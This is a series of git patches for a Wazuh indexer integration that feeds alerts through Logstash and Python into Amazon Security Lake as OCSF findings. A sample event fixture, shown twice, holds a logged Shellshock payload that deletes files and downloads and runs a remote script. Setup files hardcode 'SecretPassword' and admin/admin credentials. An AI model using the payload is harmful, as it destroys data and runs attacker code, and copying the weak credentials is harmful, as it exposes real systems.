./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - ./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 324d1f5033871722a60c4b1b54ac16b9bee5eb6e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 46/77] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml +++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From cb5ac7321bea365f46965b8bb5fa1359991422ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Wed, 21 Feb 2024 16:34:34 +0100 Subject: [PATCH 47/77] Add operational Python module to transform events to OCSF --- .../amazon-security-lake/docker-compose.yml | 67 +++++++++++ .../logstash/{ => pipeline}/pipe-output.conf | 11 +- .../logstash/{ => pipeline}/wazuh-s3.conf | 0 .../amazon-security-lake/logstash/setup.sh | 15 +++ .../amazon-security-lake/ocsf/__init__.py | 2 - .../amazon-security-lake/ocsf/converter.py | 89 -------------- .../ocsf/wazuh-event.sample.json | 90 -------------- .../amazon-security-lake/requirements.txt | 3 +- integrations/amazon-security-lake/run.py | 34 ++++++ .../stdin_to_securitylake.py | 5 +- .../transform/__init__.py | 1 + .../transform/converter.py | 112 ++++++++++++++++++ .../transform/legacy/legacy_converter.py | 87 ++++++++++++++ .../legacy/legacy_test.py} | 10 +- .../transform/models/__init__.py | 2 + .../transform/models/ocsf.py | 66 +++++++++++ .../transform/models/wazuh.py | 50 ++++++++ .../wazuh-event.sample.json | 76 ++++++++++++ 18 files changed, 525 insertions(+), 195 deletions(-) create mode 100644 integrations/amazon-security-lake/docker-compose.yml rename integrations/amazon-security-lake/logstash/{ => pipeline}/pipe-output.conf (69%) rename integrations/amazon-security-lake/logstash/{ => pipeline}/wazuh-s3.conf (100%) create mode 100644 integrations/amazon-security-lake/logstash/setup.sh delete mode 100644 integrations/amazon-security-lake/ocsf/__init__.py delete mode 100644 integrations/amazon-security-lake/ocsf/converter.py delete mode 100644 integrations/amazon-security-lake/ocsf/wazuh-event.sample.json create mode 100644 integrations/amazon-security-lake/run.py create mode 100644 integrations/amazon-security-lake/transform/__init__.py create mode 100644 integrations/amazon-security-lake/transform/converter.py create mode 100644 integrations/amazon-security-lake/transform/legacy/legacy_converter.py rename integrations/amazon-security-lake/{ocsf/test.py => transform/legacy/legacy_test.py} (57%) create mode 100644 integrations/amazon-security-lake/transform/models/__init__.py create mode 100644 integrations/amazon-security-lake/transform/models/ocsf.py create mode 100644 integrations/amazon-security-lake/transform/models/wazuh.py create mode 100644 integrations/amazon-security-lake/wazuh-event.sample.json diff --git a/integrations/amazon-security-lake/docker-compose.yml b/integrations/amazon-security-lake/docker-compose.yml new file mode 100644 index 0000000000000..6c5c1c21445c9 --- /dev/null +++ b/integrations/amazon-security-lake/docker-compose.yml @@ -0,0 +1,67 @@ +version: '3' +services: + opensearch-node: + image: opensearchproject/opensearch:latest # This should be the same image used for opensearch-node1 to avoid issues + container_name: opensearch-node + environment: + - cluster.name=opensearch-cluster + - node.name=opensearch-node + - discovery.seed_hosts=opensearch-node + - cluster.initial_cluster_manager_nodes=opensearch-node + - bootstrap.memory_lock=true + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - opensearch-data:/usr/share/opensearch/data + networks: + - opensearch-net + opensearch-dashboards: + image: opensearchproject/opensearch-dashboards:latest # Make sure the version of opensearch-dashboards matches the version of opensearch installed on other nodes + container_name: opensearch-dashboards + ports: + - 5601:5601 # Map host port 5601 to container port 5601 + expose: + - "5601" # Expose port 5601 for web access to OpenSearch Dashboards + environment: + OPENSEARCH_HOSTS: '["https://opensearch-node:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + networks: + - opensearch-net + logstash: + build: + context: . + dockerfile_inline: | + FROM logstash:8.12.1 + + COPY --chown=logstash:logstash logstash/setup.sh /usr/share/logstash/bin/setup.sh + COPY --chown=logstash:logstash logstash/pipeline/pipe-output.conf /usr/share/logstash/pipeline/pipe-output.config + + RUN bash /usr/share/logstash/bin/setup.sh + RUN /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch + container_name: logstash + environment: + LOG_LEVEL: trace + LOGSTASH_KEYSTORE_PASS: "SecretPassword" + MONITORING_ENABLED: false + ports: + - "5000:5000/tcp" + - "5000:5000/udp" + - "5044:5044" + - "9600:9600" + depends_on: + - opensearch-node + networks: + - opensearch-net + command: tail -f /dev/null + # command: logstash -f /usr/share/logstash/pipeline/pipe-output.config + +volumes: + opensearch-data: + +networks: + opensearch-net: \ No newline at end of file diff --git a/integrations/amazon-security-lake/logstash/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf similarity index 69% rename from integrations/amazon-security-lake/logstash/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf index 4f64eb5a46a54..0cc7a7d089ec3 100644 --- a/integrations/amazon-security-lake/logstash/pipe-output.conf +++ b/integrations/amazon-security-lake/logstash/pipeline/pipe-output.conf @@ -1,11 +1,10 @@ input { opensearch { - hosts => ["127.0.0.1:9200"] - user => "${WAZUH_INDEXER_USERNAME}" - password => "${WAZUH_INDEXER_PASSWORD}" + hosts => ["opensearch-node:9200"] + user => "${INDEXER_USERNAME}" + password => "${INDEXER_PASSWORD}" + ssl => false index => "wazuh-alerts-4.x-*" - ssl => true - ca_file => "/etc/logstash/wi-certs/root-ca.pem" query => '{ "query": { "range": { @@ -15,7 +14,7 @@ input { } } }' - target => "_source" + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/logstash/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf similarity index 100% rename from integrations/amazon-security-lake/logstash/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/pipeline/wazuh-s3.conf diff --git a/integrations/amazon-security-lake/logstash/setup.sh b/integrations/amazon-security-lake/logstash/setup.sh new file mode 100644 index 0000000000000..2b1fc109f401a --- /dev/null +++ b/integrations/amazon-security-lake/logstash/setup.sh @@ -0,0 +1,15 @@ +#!/usr/bin/bash + +# This script creates and configures a keystore for Logstash to store +# indexer's credentials. NOTE: works only for dockerized logstash. +# Source: https://www.elastic.co/guide/en/logstash/current/keystore.html + +# Prepare keystore +set +o history +export LOGSTASH_KEYSTORE_PASS="SecretPassword" +set -o history + +# Create keystore +/usr/share/logstash/bin/logstash-keystore create +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_USERNAME +echo "admin" | /usr/share/logstash/bin/logstash-keystore add INDEXER_PASSWORD diff --git a/integrations/amazon-security-lake/ocsf/__init__.py b/integrations/amazon-security-lake/ocsf/__init__.py deleted file mode 100644 index 777a7d20549b5..0000000000000 --- a/integrations/amazon-security-lake/ocsf/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -# Python module placeholder -# TODO export submodules \ No newline at end of file diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py deleted file mode 100644 index c927afa8fe87f..0000000000000 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ /dev/null @@ -1,89 +0,0 @@ -#!/usr/bin/python3 - -# event comes from Filebeat -#event = {} -#print(event) - -def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level - - -def join(iterable, separator=","): - return (separator.join(iterable)) - - -def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": { - #"name": join(event["_source"]["rule"]["mitre"]["tactic"]), - "dummy": True - }, - "technique": { - #"name": join(event["_source"]["rule"]["mitre"]["technique"]), - #"uid": join(event["_source"]["rule"]["mitre"]["id"]), - "dummy": True - }, - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - "lang": "en", - "vendor_name": "Wazuh, Inc,." - }, - "version": "1.1.0", - }, - #"raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] - }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - #event["_source"]["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] - ], - #"nist": event["_source"]["rule"]["nist_800_53"], # Array - } - } - - return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json b/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json deleted file mode 100644 index 3f35697a9fe36..0000000000000 --- a/integrations/amazon-security-lake/ocsf/wazuh-event.sample.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "_index": "wazuh-alerts-4.x-2024.02.08", - "_id": "yBMliY0Bt8FzffO0BOIu", - "_version": 1, - "_score": null, - "_source": { - "input": { - "type": "log" - }, - "agent": { - "name": "redacted.com", - "id": "000" - }, - "manager": { - "name": "redacted.com" - }, - "data": { - "protocol": "GET", - "srcip": "000.111.222.10", - "id": "404", - "url": "/cgi-bin/jarrewrite.sh" - }, - "rule": { - "firedtimes": 1, - "mail": false, - "level": 6, - "pci_dss": [ - "11.4" - ], - "tsc": [ - "CC6.1", - "CC6.8", - "CC7.2", - "CC7.3" - ], - "description": "Shellshock attack attempt", - "groups": [ - "web", - "accesslog", - "attack" - ], - "mitre": { - "technique": [ - "Exploitation for Privilege Escalation", - "Exploit Public-Facing Application" - ], - "id": [ - "T1068", - "T1190" - ], - "tactic": [ - "Privilege Escalation", - "Initial Access" - ] - }, - "id": "31166", - "nist_800_53": [ - "SI.4" - ], - "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", - "gdpr": [ - "IV_35.7.d" - ] - }, - "location": "/var/log/nginx/access.log", - "decoder": { - "name": "web-accesslog" - }, - "id": "1707402914.872885", - "GeoLocation": { - "city_name": "Amsterdam", - "country_name": "Netherlands", - "region_name": "North Holland", - "location": { - "lon": 4.9087, - "lat": 52.3534 - } - }, - "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", - "timestamp": "2024-02-08T11:35:14.334-0300" - }, - "fields": { - "timestamp": [ - "2024-02-08T14:35:14.334Z" - ] - }, - "sort": [ - 1707402914334 - ] -} \ No newline at end of file diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt index 8c7a1cbaae79b..8ebe50a4ef264 100644 --- a/integrations/amazon-security-lake/requirements.txt +++ b/integrations/amazon-security-lake/requirements.txt @@ -1,2 +1,3 @@ pyarrow>=10.0.1 -parquet-tools>=0.2.15 \ No newline at end of file +parquet-tools>=0.2.15 +pydantic==2.6.1 \ No newline at end of file diff --git a/integrations/amazon-security-lake/run.py b/integrations/amazon-security-lake/run.py new file mode 100644 index 0000000000000..d8234226bf98e --- /dev/null +++ b/integrations/amazon-security-lake/run.py @@ -0,0 +1,34 @@ +import transform +import json + + +def _test(): + ocsf_event = {} + with open("./wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + raw_event = json.load(fd) + try: + event = transform.converter.from_json(raw_event) + print(event) + ocsf_event = transform.converter.to_detection_finding(event) + print("") + print("--") + print("") + print(ocsf_event) + # event = Event.model_validate_json(json.dumps(event)) + # print(event) + # ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + # except ValidationError as e: + # print(e) + + # if ocsf_event: + # with open("wazuh-event.ocsf.json", "w") as fd: + # json.dump(ocsf_event.model_dump(), fd) + # print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index eee82036c3ff5..ab399f58b7b9a 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -7,8 +7,9 @@ import time import json import datetime -from pyarrow import parquet, Table -from ocsf import converter +from pyarrow import parquet, Table, fs + +from transform import converter block_ending = { "block_ending": True } diff --git a/integrations/amazon-security-lake/transform/__init__.py b/integrations/amazon-security-lake/transform/__init__.py new file mode 100644 index 0000000000000..6e8733a32b85d --- /dev/null +++ b/integrations/amazon-security-lake/transform/__init__.py @@ -0,0 +1 @@ +import transform.converter diff --git a/integrations/amazon-security-lake/transform/converter.py b/integrations/amazon-security-lake/transform/converter.py new file mode 100644 index 0000000000000..983ba9572841f --- /dev/null +++ b/integrations/amazon-security-lake/transform/converter.py @@ -0,0 +1,112 @@ +import json + +import pydantic +import transform.models as models + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def to_detection_finding(event: models.wazuh.Event) -> models.ocsf.DetectionFinding: + finding_info = models.ocsf.FindingInfo( + analytic=models.ocsf.AnalyticInfo( + category=", ".join(event.rule.groups), + name=event.decoder.name, + type_id=1, + uid=event.rule.id + ), + attacks=models.ocsf.AttackInfo( + tactic=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.tactic), + uid=", ".join(event.rule.mitre.id) + ), + technique=models.ocsf.TechniqueInfo( + name=", ".join(event.rule.mitre.technique), + uid=", ".join(event.rule.mitre.id) + ), + version="v13.1" + ), + title=event.rule.description, + types=[event.input.type], + uid=event.id + ) + + metadata = models.ocsf.Metadata( + log_name="Security events", + log_provider="Wazuh", + product=models.ocsf.ProductInfo( + name="Wazuh", + lang="en", + vendor_name="Wazuh, Inc,." + ), + version="1.1.0" + ) + + resources = [models.ocsf.Resource( + name=event.agent.name, uid=event.agent.id)] + + severity_id = normalize(event.rule.level) + + unmapped = { + "data_sources": [ + event.location, + event.manager.name + ], + "nist": event.rule.nist_800_53 # Array + } + + return models.ocsf.DetectionFinding( + count=event.rule.firedtimes, + message=event.rule.description, + finding_info=finding_info, + metadata=metadata, + raw_data=event.full_log, + resources=resources, + risk_score=event.rule.level, + severity_id=severity_id, + time=event.timestamp, + unmapped=unmapped + ) + + +def from_json(event: dict) -> models.wazuh.Event: + # Needs to a string, bytes or bytearray + try: + return models.wazuh.Event.model_validate_json(json.dumps(event)) + except pydantic.ValidationError as e: + print(e) + + +def _test(): + ocsf_event = {} + with open("wazuh-event.sample.json", "r") as fd: + # Load from file descriptor + event = json.load(fd) + try: + # Create instance of Event from JSON input (must be string, bytes or bytearray) + event = models.wazuh.Event.model_validate_json(json.dumps(event)) + print(event) + ocsf_event = to_detection_finding(event) + + except KeyError as e: + raise (e) + except pydantic.ValidationError as e: + print(e) + + if ocsf_event: + with open("wazuh-event.ocsf.json", "w") as fd: + json.dump(ocsf_event.model_dump(), fd) + print(ocsf_event.model_dump()) + + +if __name__ == '__main__': + _test() diff --git a/integrations/amazon-security-lake/transform/legacy/legacy_converter.py b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py new file mode 100644 index 0000000000000..2a14b75957c97 --- /dev/null +++ b/integrations/amazon-security-lake/transform/legacy/legacy_converter.py @@ -0,0 +1,87 @@ +#!/usr/bin/python + +# event comes from Filebeat +event = {} + + +def normalize(level: int) -> int: + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level + + +def join(iterable, separator=","): + return (separator.join(iterable)) + + +def convert(event: dict) -> dict: + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. + """ + ocsf_class_template = \ + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], + "type_id": 1, + "uid": event["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["rule"]["description"], + "types": [ + event["input"]["type"] + ], + "uid": event['id'] + }, + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." + }, + "version": "1.1.0", + }, + "raw_data": event["full_log"], + "resources": [ + { + "name": event["agent"]["name"], + "uid": event["agent"]["id"] + }, + ], + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), + "status_id": 99, + "time": event["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["location"], + event["manager"]["name"] + ], + "nist": event["rule"]["nist_800_53"], # Array + } + } + + return ocsf_class_template diff --git a/integrations/amazon-security-lake/ocsf/test.py b/integrations/amazon-security-lake/transform/legacy/legacy_test.py similarity index 57% rename from integrations/amazon-security-lake/ocsf/test.py rename to integrations/amazon-security-lake/transform/legacy/legacy_test.py index e7d947848b067..ebcb8fa4b2e90 100644 --- a/integrations/amazon-security-lake/ocsf/test.py +++ b/integrations/amazon-security-lake/transform/legacy/legacy_test.py @@ -1,15 +1,15 @@ #!/usr/bin/python -from converter import convert +from transform.legacy.converter import convert import json converted_event = {} -with open("wazuh-event.sample.json", "r") as fd: +with open("../wazuh-event.sample.json", "r") as fd: sample_event = json.load(fd) # print(json.dumps(sample_event, indent=4)) converted_event = convert(sample_event) - + if converted_event: - with open("wazuh-event.ocsf.json", "w") as fd: + with open("../wazuh-event.ocsf.json", "w") as fd: json.dump(converted_event, fd) - print("Done") \ No newline at end of file + print("Done") diff --git a/integrations/amazon-security-lake/transform/models/__init__.py b/integrations/amazon-security-lake/transform/models/__init__.py new file mode 100644 index 0000000000000..2fdec7bc648af --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/__init__.py @@ -0,0 +1,2 @@ +import transform.models.wazuh +import transform.models.ocsf diff --git a/integrations/amazon-security-lake/transform/models/ocsf.py b/integrations/amazon-security-lake/transform/models/ocsf.py new file mode 100644 index 0000000000000..4918b6e29081c --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/ocsf.py @@ -0,0 +1,66 @@ +import pydantic +import typing + + +class AnalyticInfo(pydantic.BaseModel): + category: str + name: str + type_id: int + uid: str + + +class TechniqueInfo(pydantic.BaseModel): + name: str + uid: str + + +class AttackInfo(pydantic.BaseModel): + tactic: TechniqueInfo + technique: TechniqueInfo + version: str + + +class FindingInfo(pydantic.BaseModel): + analytic: AnalyticInfo + attacks: AttackInfo + title: str + types: typing.List[str] + uid: str + + +class ProductInfo(pydantic.BaseModel): + name: str + lang: str + vendor_name: str + + +class Metadata(pydantic.BaseModel): + log_name: str + log_provider: str + product: ProductInfo + version: str + + +class Resource(pydantic.BaseModel): + name: str + uid: str + + +class DetectionFinding(pydantic.BaseModel): + activity_id: int = 1 + category_name: str = "Findings" + category_uid: int = 2 + class_name: str = "Detection Finding" + class_uid: int = 2004 + count: int + message: str + finding_info: FindingInfo + metadata: Metadata + raw_data: str + resources: typing.List[Resource] + risk_score: int + severity_id: int + status_id: int = 99 + time: str + type_uid: int = 200401 + unmapped: typing.Dict[str, typing.List[str]] = pydantic.Field() diff --git a/integrations/amazon-security-lake/transform/models/wazuh.py b/integrations/amazon-security-lake/transform/models/wazuh.py new file mode 100644 index 0000000000000..34aa3c91e96e1 --- /dev/null +++ b/integrations/amazon-security-lake/transform/models/wazuh.py @@ -0,0 +1,50 @@ +import pydantic +import typing + +# =========== Wazuh event models =========== # +# These are only the fields required for the integration. + + +class Mitre(pydantic.BaseModel): + technique: typing.List[str] = [] + id: typing.List[str] = "" + tactic: typing.List[str] = [] + + +class Rule(pydantic.BaseModel): + firedtimes: int = 0 + description: str = "" + groups: typing.List[str] = [] + id: str = "" + mitre: Mitre = Mitre() + level: int = 0 + nist_800_53: typing.List[str] = [] + + +class Decoder(pydantic.BaseModel): + name: str + + +class Input(pydantic.BaseModel): + type: str + + +class Agent(pydantic.BaseModel): + name: str + id: str + + +class Manager(pydantic.BaseModel): + name: str + + +class Event(pydantic.BaseModel): + rule: Rule = {} + decoder: Decoder = {} + input: Input = {} + id: str = "" + full_log: str = "" + agent: Agent = {} + timestamp: str = "" + location: str = "" + manager: Manager = {} diff --git a/integrations/amazon-security-lake/wazuh-event.sample.json b/integrations/amazon-security-lake/wazuh-event.sample.json new file mode 100644 index 0000000000000..d7e0558b62c62 --- /dev/null +++ b/integrations/amazon-security-lake/wazuh-event.sample.json @@ -0,0 +1,76 @@ +{ + "input": { + "type": "log" + }, + "agent": { + "name": "redacted.com", + "id": "000" + }, + "manager": { + "name": "redacted.com" + }, + "data": { + "protocol": "GET", + "srcip": "000.111.222.10", + "id": "404", + "url": "/cgi-bin/jarrewrite.sh" + }, + "rule": { + "firedtimes": 1, + "mail": false, + "level": 6, + "pci_dss": [ + "11.4" + ], + "tsc": [ + "CC6.1", + "CC6.8", + "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" +} \ No newline at end of file From 05ae2d15a92777e885cc3890ebf94ac2bab65b1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Thu, 22 Feb 2024 15:49:49 +0100 Subject: [PATCH 48/77] Create minimal Docker environment to test and develop the integration. --- integrations/.gitignore | 5 + integrations/README.md | 32 ++++ .../amazon-security-lake/.dockerignore | 180 ++++++++++++++++++ integrations/amazon-security-lake/Dockerfile | 41 ++++ integrations/amazon-security-lake/README.md | 15 +- .../logstash/pipeline/indexer-to-file.conf | 26 +++ ...output.conf => indexer-to-integrator.conf} | 0 .../{wazuh-s3.conf => indexer-to-s3.conf} | 0 .../amazon-security-lake/logstash/setup.sh | 11 +- integrations/amazon-security-lake/run.py | 2 + .../stdin_to_securitylake.py | 2 +- .../amazon-security-lake.yml} | 29 ++- .../tools/events-generator/.dockerignore | 2 + .../tools/events-generator/Dockerfile | 4 + integrations/tools/events-generator/README.md | 11 ++ integrations/tools/events-generator/run.py | 13 +- 16 files changed, 349 insertions(+), 24 deletions(-) create mode 100644 integrations/.gitignore create mode 100644 integrations/README.md create mode 100644 integrations/amazon-security-lake/.dockerignore create mode 100644 integrations/amazon-security-lake/Dockerfile create mode 100644 integrations/amazon-security-lake/logstash/pipeline/indexer-to-file.conf rename integrations/amazon-security-lake/logstash/pipeline/{pipe-output.conf => indexer-to-integrator.conf} (100%) rename integrations/amazon-security-lake/logstash/pipeline/{wazuh-s3.conf => indexer-to-s3.conf} (100%) rename integrations/{amazon-security-lake/docker-compose.yml => docker/amazon-security-lake.yml} (69%) create mode 100644 integrations/tools/events-generator/.dockerignore create mode 100644 integrations/tools/events-generator/Dockerfile diff --git a/integrations/.gitignore b/integrations/.gitignore new file mode 100644 index 0000000000000..8f10b6459740c --- /dev/null +++ b/integrations/.gitignore @@ -0,0 +1,5 @@ +elastic +opensearch +splunk +common +config \ No newline at end of file diff --git a/integrations/README.md b/integrations/README.md new file mode 100644 index 0000000000000..5e69b4f673d6c --- /dev/null +++ b/integrations/README.md @@ -0,0 +1,32 @@ +## Wazuh indexer integrations + +This folder contains integrations with third-party XDR, SIEM and cybersecurity software. +The goal is to transport Wazuh's analysis to the platform that suits your needs. + +### Amazon Security Lake + +TBD + +##### Usage + +A demo of the integration can be started using the content of this folder and Docker. + +```console +docker compose -f ./docker/amazon-security-lake.yml up -d +``` + +This docker compose project will bring a *wazuh-indexer* node, a *wazuh-dashboard* node, +a *logstash* node and our event generator. On the one hand, the event generator will push events +constantly to the indexer. On the other hand, logstash will constantly query for new data and +deliver it to the integration Python program, also present in that node. Finally, the integration +module will prepare and send the data to the Amazon Security Lake's S3 bucket. + + +For production usage, follow the instructions in our documentation page about this matter. +(_when-its-done_) + +As a last note, we would like to point out that we also use this Docker environment for development. + +### Other integrations + +TBD diff --git a/integrations/amazon-security-lake/.dockerignore b/integrations/amazon-security-lake/.dockerignore new file mode 100644 index 0000000000000..891ff7a135014 --- /dev/null +++ b/integrations/amazon-security-lake/.dockerignore @@ -0,0 +1,180 @@ +wazuh-event.ocsf.json +*.parquet +Dockerfile + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ 